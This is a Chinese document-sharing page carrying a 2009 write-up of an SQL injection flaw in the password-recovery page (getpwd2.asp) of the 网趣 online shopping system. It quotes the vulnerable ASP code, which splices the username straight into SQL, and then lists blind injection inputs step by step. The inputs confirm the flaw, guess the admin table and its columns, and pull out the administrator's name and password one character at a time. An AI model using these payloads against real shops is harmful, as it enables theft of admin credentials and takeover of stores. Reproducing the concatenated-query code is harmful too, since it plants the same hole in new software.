为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

网趣网上购物系统SQL注入漏洞浅析

2018-04-12 2页 doc 13KB 68阅读

用户头像

is_348501

暂无简介

举报
网趣网上购物系统SQL注入漏洞浅析网趣网上购物系统SQL注入漏洞浅析 阅读:47 时间:2009-8-25 5:30:34 整理:华夏黑盟 ------------------------------------------------------------------ author: cnryan @ 网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。 这是官方的话 ? 这...
网趣网上购物系统SQL注入漏洞浅析
网趣网上购物系统SQL注入漏洞浅析 阅读:47 时间:2009-8-25 5:30:34 整理:华夏黑盟 ------------------------------------------------------------------ author: cnryan @ 网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。 这是官方的话 ? 这个sql injection出现在找回密码处,最新版本的9.4也存在漏洞,随后对v9.0等以下版本测试均存在漏洞。 漏洞页面:getpwd2.asp 漏洞代码: <% username=request.form("username") set rs=Server.CreateObject("Adodb.Recordset") sql="select * from [user] where username='"&username&"' " rs.open sql,conn,1,1 If rs.eof Then %> 典型的注入,和以前的网软购物系统一个模样 是找回密码的页面,输入的用户名交给getpwd2.asp处理,若存在用户名到达第二步,否则退出 输入 test' and 1=1 and ''=' 跳到getpwd2.asp 第二步 输入 test' and 1=2 and ''=' 提示没有这个用户 猜表 ->cnhww test' and exists (select * from [admin]) and '1'='1 F test' and exists (select * from [cnhww]) and '1'='1 T 字段 ->admin password test' and exists (select admin from [cnhww]) and '1'='1 T test' and exists (select password from [cnhww]) and '1'='1 T 值 --> test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>97 and '1'='1 F test' and (select top 1 asc(mid(admin,1,1)) from cnhww)>96 and '1'='1 T 97=a test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>100 and '1'='1 F test' and (select top 1 asc(mid(admin,2,1)) from cnhww)>99 and '1'='1 T 100=d …… test' and (select top 1 asc(mid(password,1,1)) from cnhww)>55 and '1'='1 …… ……
/
本文档为【网趣网上购物系统SQL注入漏洞浅析】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。

历史搜索

    清空历史搜索